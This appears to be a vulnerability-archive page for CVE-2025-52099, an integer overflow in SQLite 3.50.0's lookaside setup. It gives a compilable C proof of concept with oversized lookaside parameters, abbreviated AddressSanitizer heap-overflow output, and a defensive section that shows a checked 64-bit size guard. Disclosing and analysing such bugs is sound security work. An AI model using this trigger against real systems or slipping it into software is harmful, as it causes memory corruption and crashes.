Related vulnerability
Description
an integer overflow in SQLite 3.50.0
Introduction
# CVE-2025-52099
an integer overflow in SQLite 3.50.0
A proof-of-concept (PoC) to trigger an integer overflow in SQLite 3.50.0's `setupLookaside` function is provided below. This overflow occurs due to unchecked multiplication of `sz * nBig`, which can wrap into a negative value and result in invalid memory writes.
Tested on: Ubuntu 22.04 x86_64 with SQLite 3.50.0 (custom built)
PoC code (C):
```c
#include <stdio.h>
#include <sqlite3.h>

int main(void) {
    sqlite3 *db;

    // Open (or create) the SQLite database file
    if (sqlite3_open("test.db", &db)) {
        fprintf(stderr, "Can't open database: %s\n", sqlite3_errmsg(db));
        sqlite3_close(db);  // a handle is returned even on failure and must be released
        return 1;
    }

    // Malicious lookaside configuration
    // sz = 140, cnt = 1979733333
    // This causes internal sz * nBig to overflow and produces negative nSm
    int rc = sqlite3_db_config(db, SQLITE_DBCONFIG_LOOKASIDE, NULL, 140, 1979733333);
    if (rc != SQLITE_OK) {
        fprintf(stderr, "Failed to configure lookaside: %d\n", rc);
        sqlite3_close(db);
        return 2;
    } else {
        printf("[+] Lookaside configured\n");
    }

    // Create table and perform many inserts to exercise the corrupted lookaside pool
    sqlite3_exec(db, "CREATE TABLE test(id INTEGER);", NULL, NULL, NULL);
    for (int i = 0; i < 100000; i++) {
        char sql[64];
        snprintf(sql, sizeof(sql), "INSERT INTO test(id) VALUES(%d);", i);
        sqlite3_exec(db, sql, NULL, NULL, NULL);
    }

    printf("[+] Insert finished. Closing DB.\n");
    sqlite3_close(db);
    return 0;
}
```
This PoC, when compiled with AddressSanitizer (`-fsanitize=address`), results in a heap-buffer-overflow due to an invalid lookaside slot configuration.
Observed output with ASAN:

```
==12345==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000f000 ...
READ of size 8 at 0x60200000f000 thread T0
...
```
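The following is an added example, not part of the PoC above and not SQLite's own code. It shows why the `sz * nBig` product described above goes negative: with the PoC's parameters (sz = 140, cnt = 1979733333) the true product is 277,162,666,620, which does not fit in a 32-bit `int`, so the low 32 bits are kept and read back as -2,010,207,620. Beside the wrapped computation it shows the checked form a caller could apply before handing sizes to `sqlite3_db_config()`: widen to 64 bits and reject any product above `INT32_MAX`. The helper names (`wrapped_product`, `checked_product`, `lookaside_params_ok`) are hypothetical, and the assumption that the library multiplies in 32-bit `int` is taken from the PoC description, not verified here against SQLite's source.

```c
/* Added example (not from the PoC or from SQLite): demonstrates the 32-bit
 * wrap of sz * cnt from the PoC and a checked computation a caller can use
 * to reject such parameters before they reach the library. */
#include <stdint.h>
#include <limits.h>
#include <stdio.h>

/* Reproduces the unchecked 32-bit product. The wrap is performed in unsigned
 * arithmetic (well-defined in C) and then converted to int32_t; on
 * two's-complement targets this yields the same bit pattern that an
 * overflowing signed multiplication would leave behind. */
int32_t wrapped_product(int32_t sz, int32_t cnt)
{
    uint32_t raw = (uint32_t)sz * (uint32_t)cnt;  /* wraps modulo 2^32 */
    return (int32_t)raw;
}

/* Checked version: widen to 64 bits, then reject anything negative or larger
 * than INT32_MAX. Returns 1 when the product is safe (stored in *out), else 0. */
int checked_product(int32_t sz, int32_t cnt, int32_t *out)
{
    if (sz < 0 || cnt < 0)
        return 0;
    int64_t wide = (int64_t)sz * (int64_t)cnt;  /* two int32 values cannot overflow int64 */
    if (wide > INT32_MAX)
        return 0;
    *out = (int32_t)wide;
    return 1;
}

/* Hypothetical pre-check for lookaside parameters (sz bytes per slot,
 * cnt slots): 1 = pass on to the library, 0 = reject. This is an
 * application-side guard, not an API SQLite provides. */
int lookaside_params_ok(int sz, int cnt)
{
    int32_t total;
    return checked_product(sz, cnt, &total);
}

int main(void)
{
    /* Values taken from the PoC above. */
    int32_t sz = 140, cnt = 1979733333;
    int32_t total;

    printf("unchecked: %d * %d = %d (wrapped to negative)\n",
           sz, cnt, wrapped_product(sz, cnt));
    if (!checked_product(sz, cnt, &total))
        printf("checked:   %d * %d rejected (exceeds INT32_MAX)\n", sz, cnt);

    /* Constructed, reasonable configuration for comparison. */
    if (checked_product(1200, 40, &total))
        printf("checked:   1200 * 40 = %d accepted\n", total);
    return 0;
}
```

The key point for a defender is that the guard has to happen before the multiplication, and in a wider type than the result: checking `sz * cnt < 0` after the fact relies on undefined signed-overflow behaviour and can be optimised away by the compiler, whereas the `int64_t` comparison above is always well-defined.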
File snapshot
[4.0K] /data/pocs/598421544a6a9b0bfa417f6eab7ae0ec15b870af
├── [ 764] exploit.c
└── [1.8K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.